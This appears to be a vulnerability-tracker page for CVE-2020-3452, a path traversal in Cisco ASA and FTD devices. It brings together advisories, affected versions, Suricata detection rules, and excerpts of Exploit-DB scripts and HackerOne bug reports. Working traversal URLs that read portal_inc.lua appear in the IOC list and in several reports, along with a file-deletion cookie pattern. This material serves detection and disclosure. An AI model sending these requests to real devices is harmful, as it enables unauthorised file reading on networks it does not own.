CVE-2020-3452
published 2020-07-22CVE-2020-3452: A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow…
PriorityP190high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
99.99%
100.0th percentile
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.
Affected
19 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cisco | adaptive_security_appliance | — | — |
| cisco | adaptive_security_appliance_software | >= 9.10 < 9.10.1.42 | 9.10.1.42 |
| cisco | adaptive_security_appliance_software | >= 9.12 < 9.12.3.12 | 9.12.3.12 |
| cisco | adaptive_security_appliance_software | >= 9.13 < 9.13.1.10 | 9.13.1.10 |
| cisco | adaptive_security_appliance_software | >= 9.14 < 9.14.1.10 | 9.14.1.10 |
| cisco | adaptive_security_appliance_software | >= 9.6 < 9.6.4.42 | 9.6.4.42 |
| cisco | adaptive_security_appliance_software | >= 9.8 < 9.8.4.20 | 9.8.4.20 |
| cisco | adaptive_security_appliance_software | >= 9.9 < 9.9.2.74 | 9.9.2.74 |
| cisco | cisco_adaptive_security_appliance_software | >= unspecified < 9.6.4.42 | 9.6.4.42 |
| cisco | cisco_adaptive_security_appliance_software | >= unspecified < 9.8.4.20 | 9.8.4.20 |
| cisco | cisco_adaptive_security_appliance_software | >= unspecified < 9.9.2.74 | 9.9.2.74 |
| cisco | cisco_adaptive_security_appliance_software | >= unspecified < 9.10.1.42 | 9.10.1.42 |
| cisco | cisco_adaptive_security_appliance_software | >= unspecified < 9.13.1.10 | 9.13.1.10 |
| cisco | cisco_adaptive_security_appliance_software | >= unspecified < 9.14.1.10 | 9.14.1.10 |
| cisco | firepower_threat_defense | >= 6.2.3 < 6.2.3.16 | 6.2.3.16 |
| cisco | firepower_threat_defense | >= 6.3.0 < 6.3.0.6 | 6.3.0.6 |
| cisco | firepower_threat_defense | >= 6.4.0 < 6.4.0.10 | 6.4.0.10 |
| cisco | firepower_threat_defense | >= 6.5.0 < 6.5.0.5 | 6.5.0.5 |
| cisco | firepower_threat_defense | >= 6.6.0 < 6.6.0.1 | 6.6.0.1 |
Detection & IOCsextracted from sources · hover to see the quote
url/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../↗
url/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua↗
yara↗
matchers: words: ["INTERNAL_PASSWORD_ENABLED", "CONF_VIRTUAL_KEYBOARD"] condition: and
- →Exploit attempts can be detected by monitoring HTTP GET requests to the /+CSCOT+/translation-table or /+CSCOT+/oem-customization endpoints containing directory traversal sequences (%2b, ../) targeting the web services file system. ↗
- →Successful exploitation of CVE-2020-3452 results in HTTP responses containing the strings 'INTERNAL_PASSWORD_ENABLED' and 'CONF_VIRTUAL_KEYBOARD' from the portal_inc.lua file — use these as response body match conditions. ↗
- →The CVE-2020-3187 (file deletion) exploit uses a crafted Cookie header with traversal path 'token=..//+CSCOU+/<filename>' sent to /+CSCOE+/session_password.html — monitor for this cookie pattern in HTTP requests. ↗
- →Check Point IPS signature 'Cisco Adaptive Security Appliance Directory Traversal (CVE-2020-3452)' provides network-level detection for exploitation attempts. ↗
- ·The vulnerability is only exploitable when WebVPN or AnyConnect features are configured on the device — systems without these features enabled are not affected. ↗
- ·The path traversal is limited to the web services file system (RamFS); it cannot be used to read ASA/FTD system files or underlying OS files. ↗
- ·Cisco ASA releases 9.5 and earlier, and release 9.7, have reached end of software maintenance and will not receive patches — customers must migrate to a supported release. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck7.5HIGH
cisa7.5HIGH
vendor_cisco7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Cisco ASA and FTD Read-Only Path Traversal Vulnerability
cisa·2021-11-03·CVSS 7.5
CVE-2020-3452 [HIGH] CWE-20 Cisco ASA and FTD Read-Only Path Traversal Vulnerability
Vulnerability: Cisco ASA and FTD Read-Only Path Traversal Vulnerability
Affected: Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)
Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) contain an improper input validation vulnerability when HTTP requests process URLs. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2020-3452
Remediation Due Date: 2022-05-03
Cisco
Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Web Services Read-Only Path Traversal Vulnerability
vendor_cisco·2020-07-22·CVSS 7.5
CVE-2020-3452 [HIGH] CWE-20 Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Web Services Read-Only Path Traversal Vulnerability
Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Web Services Read-Only Path Traversal Vulnerability
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system.
The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on t
Cisco
Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Web Services Read-Only Path Traversal Vulnerability
vendor_cisco·CVSS 3.1
CVE-2020-3452 Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Web Services Read-Only Path Traversal Vulnerability
CVE-2020-3452: Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Web Services Read-Only Path Traversal Vulnerability
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services fil
GHSA
GHSA-q26c-r46f-6fcq: A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software co
ghsa_unreviewed·2022-05-24
CVE-2020-3452 [MEDIUM] CWE-20 GHSA-q26c-r46f-6fcq: A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software co
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect fea
VulnCheck
Cisco ASA and FTD Read-Only Path Traversal Vulnerability
vulncheck·2020·CVSS 7.5
CVE-2020-3452 [HIGH] CWE-20 Cisco ASA and FTD Read-Only Path Traversal Vulnerability
Cisco ASA and FTD Read-Only Path Traversal Vulnerability
Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) contain an improper input validation vulnerability when HTTP requests process URLs. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device.
Affected: Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD)
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/
Suricata
ET EXPLOIT Cisco ASA and Firepower Path Traversal Vulnerability M2 (CVE-2020-3452)
suricata·2021-10-27·CVSS 7.5
CVE-2020-3452 [HIGH] ET EXPLOIT Cisco ASA and Firepower Path Traversal Vulnerability M2 (CVE-2020-3452)
ET EXPLOIT Cisco ASA and Firepower Path Traversal Vulnerability M2 (CVE-2020-3452)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Cisco ASA and Firepower Path Traversal Vulnerability M2 (CVE-2020-3452)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/oem-customization?"; nocase; fast_pattern; content:"app=AnyConnect"; nocase; content:"type=oem"; nocase; content:"platform="; nocase; content:"resource-type="; nocase; content:"name="; nocase; content:"|2e 2e|"; reference:url,twitter.com/aboul3la/status/1286141887716503553; reference:cve,2020-3452; classtype:attempted-admin; sid:2034263; rev:1; metadata:created_at 2021_10_27, cve CVE_2020_3452, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag CIS
Suricata
ET EXPLOIT Cisco ASA and Firepower Path Traversal Vulnerability M1 (CVE-2020-3452)
suricata·2021-10-27·CVSS 7.5
CVE-2020-3452 [HIGH] ET EXPLOIT Cisco ASA and Firepower Path Traversal Vulnerability M1 (CVE-2020-3452)
ET EXPLOIT Cisco ASA and Firepower Path Traversal Vulnerability M1 (CVE-2020-3452)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Cisco ASA and Firepower Path Traversal Vulnerability M1 (CVE-2020-3452)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/translation-table?"; nocase; fast_pattern; content:"type=mst"; content:"textdomain="; content:"&lang="; content:"|2e 2e|"; reference:url,twitter.com/aboul3la/status/1286012324722155525; reference:cve,2020-3452; classtype:attempted-admin; sid:2034262; rev:1; metadata:created_at 2021_10_27, cve CVE_2020_3452, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_10_27, mitre_tactic
Suricata
ET EXPLOIT Cisco ASA/Firepower Unauthenticated File Read (CVE-2020-3452) M1
suricata·2020-07-23·CVSS 7.5
CVE-2020-3452 [HIGH] ET EXPLOIT Cisco ASA/Firepower Unauthenticated File Read (CVE-2020-3452) M1
ET EXPLOIT Cisco ASA/Firepower Unauthenticated File Read (CVE-2020-3452) M1
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Cisco ASA/Firepower Unauthenticated File Read (CVE-2020-3452) M1"; flow:established,to_server; http.uri; content:"/+CSCOT+/translation-table?type=mst&textdomain=/|2b|CSCOE|2b|/"; fast_pattern; content:"&default-language&lang="; distance:0; http.uri.raw; content:"&default-language&lang=../"; reference:url,tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86; reference:cve,2020-3452; classtype:attempted-user; sid:2030581; rev:3; metadata:affected_product Web_Server_Applications, attack_target Networking_Equipment, created_at 2020_07_23, cve CVE_2020_3452, deployment Perimeter, deployment Datacenter, deploym
Suricata
ET EXPLOIT Cisco ASA/Firepower Unauthenticated File Read (CVE-2020-3452) M2
suricata·2020-07-23·CVSS 7.5
CVE-2020-3452 [HIGH] ET EXPLOIT Cisco ASA/Firepower Unauthenticated File Read (CVE-2020-3452) M2
ET EXPLOIT Cisco ASA/Firepower Unauthenticated File Read (CVE-2020-3452) M2
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Cisco ASA/Firepower Unauthenticated File Read (CVE-2020-3452) M2"; flow:established,to_server; http.uri; content:"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform="; fast_pattern; content:"&name=|2b|CSCOE|2b 2f|"; distance:0; http.uri.raw; content:"&platform=..&resource-type=.."; reference:url,tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86; reference:cve,2020-3452; classtype:attempted-user; sid:2030582; rev:2; metadata:affected_product Web_Server_Applications, attack_target Networking_Equipment, created_at 2020_07_23, cve CVE_2020_3452, deployment Perimeter, deployment Datacenter, deploym
Suricata
ET EXPLOIT Cisco ASA/Firepower Unauthenticated File Read (CVE-2020-3452) M3
suricata·2020-07-23·CVSS 7.5
CVE-2020-3452 [HIGH] ET EXPLOIT Cisco ASA/Firepower Unauthenticated File Read (CVE-2020-3452) M3
ET EXPLOIT Cisco ASA/Firepower Unauthenticated File Read (CVE-2020-3452) M3
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Cisco ASA/Firepower Unauthenticated File Read (CVE-2020-3452) M3"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/+CSCO"; fast_pattern; content:"=.."; distance:0; reference:url,tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86; reference:cve,2020-3452; classtype:attempted-user; sid:2030585; rev:1; metadata:affected_product Web_Server_Applications, attack_target Networking_Equipment, created_at 2020_07_23, cve CVE_2020_3452, deployment Perimeter, deployment Datacenter, deployment SSLDecrypt, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Gener
Exploit-DB
Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)
exploitdb·2020-12-15·CVSS 7.5
CVE-2020-3452 [HIGH] Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)
Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)
---
# Exploit Title: Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)
# Date: 12 Dec 2020
# Exploit Author: [email protected]
# Vendor Homepage: cisco.com
# Software Link: It’s against Hardware, specifically ASA’s and FTD’s
# Version: ASAs (from version 9.6 to 9.14.1.10) and FTD’s (versions 6.2.3 to 6.6.0.1)
# Tested on: exploit runs on Python3 on OSX and on Kali Linux against cisco ASA 9.14
# CVE : CVE-2020-3452
# Github : https://github.com/cygenta/CVE-2020-3452
import requests
# Written by freakyclown for @CygentaHQ
# Cisco ASA Path Traversal
# CVE-2020-3452
# Usage: CVE-2020-3452.py {target}"
# Example: CVE-2020-3452.py 192.168.0.12"
# Requires - Requests - pip3 install requests
#
# This tool takes advantage o
Exploit-DB
Cisco ASA and FTD 9.6.4.42 - Path Traversal
exploitdb·2020-10-12·CVSS 7.5
CVE-2020-3452 [HIGH] Cisco ASA and FTD 9.6.4.42 - Path Traversal
Cisco ASA and FTD 9.6.4.42 - Path Traversal
---
# Exploit Title: Cisco ASA and FTD 9.6.4.42 - Path Traversal
# Date: 2020-10-10
# Exploit Author: 3ndG4me
# Vendor: www.cisco.com
# Product: https://www.cisco.com/c/en/us/products/security/asa-firepower-services/index.html
# CVE : CVE-2020-3452
TARGET=$1
CISCO_KNOWN_FILES="logo.gif http_auth.html user_dialog.html localization_inc.lua portal_inc.lua include nostcaccess.html ask.html no_svc.html svc.html session.js useralert.html ping.html help app_index.html tlbr portal_forms.js logon_forms.js win.js portal.css portal.js sess_update.html blank.html noportal.html portal_ce.html portal.html home logon_custom.css portal_custom.css preview.html session_expired custom portal_elements.html commonspawn.js common.js appstart.js appstatus relaymonj
Exploit-DB
Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion
exploitdb·2020-07-29·CVSS 9.1
CVE-2020-3187 [CRITICAL] Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion
Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion
---
# Exploit Title: Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion
# Google Dork: inurl:/+CSCOE+/
# Date: 2020-08-27
# Exploit Author: 0xmmnbassel
# Vendor Homepage: https://www.cisco.com/c/en/us/products/security/asa-firepower-services/index.html#~models
# Version: Cisco ASA Software >=9.14 except 9.11 Cisco FTD Software >=6.2.2 and 6.2.3,6.3.0,6.4.0,6.50,6.60
# Vulnerability Type: unauthenticated file deletion
# Version: Cisco ASA Software releases 9.5 and earlier, as well as
# Release 9.7, have reached end of software maintenance. Customers are
# advised to migrate to a supported release that includes the fix for
# this vulnerability.
# CVE : CVE-2020-318
Exploit-DB
Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion
exploitdb·2020-07-28·CVSS 7.5
CVE-2020-3452 [HIGH] Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion
Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion
---
# Exploit Title: Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion
# Google Dork: inurl:/+CSCOE+/
# Date: 2020-08-27
# Exploit Author: 0xmmnbassel
# Vendor Homepage: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
# Version: Cisco ASA Software >=9.14 except 9.11 Cisco FTD Software >=6.2.2 and 6.2.3,6.3.0,6.4.0,6.50,6.60
# Vulnerability Type: unauthenticated file read
# CVE: CVE-2020-3452
#!/bin/bash
read="%2bCSCOE%2b/portal_inc.lua"
helpFunction()
{
echo ""
echo -e "\t\tCVE-2020-3452"
echo ""
echo "Usage: $0 -l targets.txt -r %2bCSCOE%2b/portal_inc.lua "
echo -e "\t-l for list of IPs in text file"
echo -e "\t-r file to read, default:
Nuclei
Cisco Adaptive Security Appliance (ASA)/Firepower Threat Defense (FTD) - Local File Inclusion
nuclei·CVSS 7.5
CVE-2020-3452 [HIGH] Cisco Adaptive Security Appliance (ASA)/Firepower Threat Defense (FTD) - Local File Inclusion
Cisco Adaptive Security Appliance (ASA)/Firepower Threat Defense (FTD) - Local File Inclusion
Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software is vulnerable to local file inclusion due to directory traversal attacks that can read sensitive files on a targeted system because of a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVP
Nuclei
Cisco ASA Security Checks
nuclei·CVSS 7.5
CVE-2020-3187 [HIGH] Cisco ASA Security Checks
Cisco ASA Security Checks
A simple workflow that runs all Cisco ASA related nuclei templates on a given target.
Template:
id: cisco-asa-workflow
info:
name: Cisco ASA Security Checks
author: flag007
description: A simple workflow that runs all Cisco ASA related nuclei templates on a given target.
workflows:
- template: http/exposed-panels/cisco/cisco-asa-panel.yaml
subtemplates:
- template: http/cves/2020/CVE-2020-3187.yaml
- template: http/cves/2020/CVE-2020-3452.yaml
- template: http/cves/2018/CVE-2018-0296.yaml
Greynoiseio
25,000 IPs Scanned Cisco ASA Devices — New Vulnerability Potentially Incoming
blogs_greynoiseio·2025-09-04
25,000 IPs Scanned Cisco ASA Devices — New Vulnerability Potentially Incoming
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Tenable
One Year Later: What Can We Learn from Zerologon?
blogs_tenable·2021-08-11
One Year Later: What Can We Learn from Zerologon?
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Checkpoint
27th July – Threat Intelligence Bulletin
blogs_checkpoint·2020-07-27
CVE-2020-3452 27th July – Threat Intelligence Bulletin
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 27th July – Threat Intelligence Bulletin
For the latest discoveries in cyber research for the week of 27th July 2020, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Check Point Research has found a long-term evolving phishing campaign turning to Google Cloud Storage and Google Cloud Functions to host phishing pages and steal users’ e-mail credentials.
Telecom Argentina has suffered a major ransomware attack demanding $7.5 million in cryptocurrency to unlock encrypted files.
Check
Tenable
CVE-2020-3452: Cisco Adaptive Security Appliance and Firepower Threat Defense Path Traversal Vulnerability
blogs_tenable·2020-07-23·CVSS 7.5
[HIGH] CVE-2020-3452: Cisco Adaptive Security Appliance and Firepower Threat Defense Path Traversal Vulnerability
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
HackerOne
Unathenticated file read (CVE-2020-3452)
hackerone·2023-11-17·CVSS 7.5
CVE-2020-3452 [HIGH] Unathenticated file read (CVE-2020-3452)
Unathenticated file read (CVE-2020-3452)
**Description:**
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device.
## References
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
https://www.rapid7.com/blog/post/2020/07/23/cve-2020-3452-cisco-asa-firepower-read-only-path-traversal-vulnerability-what-you-need-to-know/
## Impact
Impact
An attacker could exploit this vulnerability by sending a cra
HackerOne
[CVE-2020-3452] Unauthenticated file read in Cisco ASA
hackerone·2022-05-12·CVSS 7.5
CVE-2020-3452 [HIGH] [CVE-2020-3452] Unauthenticated file read in Cisco ASA
[CVE-2020-3452] Unauthenticated file read in Cisco ASA
i found out that https://█████████/ was vulnerable to CVE-2020-3452
The IP has a SSL certificate pointing to █████████
curl -kv https://██████████/
Output
```
Server certificate:
* subject: C=US; ████.mil
```
## Impact
Anyone can read any file present on the server.
## System Host(s)
███
## Affected Product(s) and Version(s)
## CVE Numbers
CVE-2020-3452
## Steps to Reproduce
You can test it by visiting the URL:
1. https://██████████/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
2. https://███████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
## Suggested Mitigation/Remediation Actions
https://tools.cisco.com
HackerOne
[CVE-2020-3452] Unauthenticated file read in Cisco ASA
hackerone·2022-05-12·CVSS 7.5
CVE-2020-3452 [HIGH] [CVE-2020-3452] Unauthenticated file read in Cisco ASA
[CVE-2020-3452] Unauthenticated file read in Cisco ASA
i found out that https://█████/ was vulnerable to CVE-2020-3452
The IP has a SSL certificate pointing to ██████████
curl -kv https://███████/
Output;
```
Server certificate:
███
```
## Impact
Anyone can read any file present on the server.
## System Host(s)
█████
## Affected Product(s) and Version(s)
## CVE Numbers
CVE-2020-3452
## Steps to Reproduce
You can test it by visiting the URL:
1. https://█████████/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
2. https://█████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
## Suggested Mitigation/Remediation Actions
https://tools.cisco.com/security/center/content/Cis
HackerOne
[CVE-2020-3452] on ███████
hackerone·2022-04-07·CVSS 7.5
CVE-2020-3452 [HIGH] [CVE-2020-3452] on ███████
[CVE-2020-3452] on ███████
The following subdomain is vulnerable to CVE-2020-3452, which is an unauthenticated file read in Cisco ASA & Cisco Firepower.
# URL:
https://████/
# Vulnerable URL:
https://███/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
██████████
# Resources:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
## Impact
The vulnerability could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system.
## System Host(s)
███
## Affected Product(s) and Version(s)
## CVE Numbers
CVE-2020-3452
## Steps to Reproduce
* Go to https://██████/+CSCOE+/logon.html
* Intercept the request with Burpsuite
* Se
HackerOne
CVE-2020-3452 on https://█████/
hackerone·2022-03-18·CVSS 7.5
CVE-2020-3452 [HIGH] CVE-2020-3452 on https://█████/
CVE-2020-3452 on https://█████/
Hello team,
I hope you're doing well, healthy & wealthy.
I found a CVE-2020-3452 path traversal and here is the explanation.
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web
HackerOne
CVE-2020-3452 Cisco ASA / Firepower Read-Only Path Traversal Vulnerability - https://esccvc.de.ibm.com
hackerone·2022-03-11·CVSS 7.5
CVE-2020-3452 [HIGH] CVE-2020-3452 Cisco ASA / Firepower Read-Only Path Traversal Vulnerability - https://esccvc.de.ibm.com
CVE-2020-3452 Cisco ASA / Firepower Read-Only Path Traversal Vulnerability - https://esccvc.de.ibm.com
A vulnerability in the interface of Cisco Adaptive Security Appliance and Cisco Firepower Threat Defense (FTD) was reported to IBM, analyzed and have been remediated. Thank you to Khaled (0xelkomy).
HackerOne
[CVE-2020-3452] Unauthenticated file read in Cisco ASA
hackerone·2022-02-14·CVSS 7.5
CVE-2020-3452 [HIGH] [CVE-2020-3452] Unauthenticated file read in Cisco ASA
[CVE-2020-3452] Unauthenticated file read in Cisco ASA
I found out that https://███/ was vulnerable to CVE-2020-3452.
The IP has a SSL certificate pointing to DoD.
`curl -kv https://██████████/`
Output:
```
Server certificate:
* subject: █████
```
## Impact
Anyone can read any file present on the server.
## System Host(s)
████
## Affected Product(s) and Version(s)
## CVE Numbers
## Steps to Reproduce
You can test it by visiting the URL:
https://██████████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
https://███████/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
## Suggested Mitigation/Remediation Actions
https://tools.cisco.com/security/center/content/CiscoSecu
HackerOne
CVE-2020-3452 - unauthenticated file read on anyconnect.routematch.com
hackerone·2021-08-05·CVSS 7.5
CVE-2020-3452 [HIGH] CVE-2020-3452 - unauthenticated file read on anyconnect.routematch.com
CVE-2020-3452 - unauthenticated file read on anyconnect.routematch.com
The CISCO ASA instance at anyconnect.routematch.com was vulnerable to CVE-2020-3452, allowing an unauthenticated attacker to retrieve arbitrary files on the local filesystem.
HackerOne
Path Traversal - [ CVE-2020-3452 ]
hackerone·2021-05-11·CVSS 7.5
CVE-2020-3452 [HIGH] Path Traversal - [ CVE-2020-3452 ]
Path Traversal - [ CVE-2020-3452 ]
Hello,
I would like to report Path Traversal issue [ CVE-2020-3452 ] was found on https://█████/.
POC: https://█████████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
## Impact
https://nvd.nist.gov/vuln/detail/CVE-2020-3452
## System Host(s)
███
## Affected Product(s) and Version(s)
## CVE Numbers
CVE-2020-3452
## Steps to Reproduce
Follow this URL to see the bug exists --> https://████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
## Suggested Mitigation/Remediation Actions
HackerOne
https://████ is vulnerable to cve-2020-3452
hackerone·2021-05-11
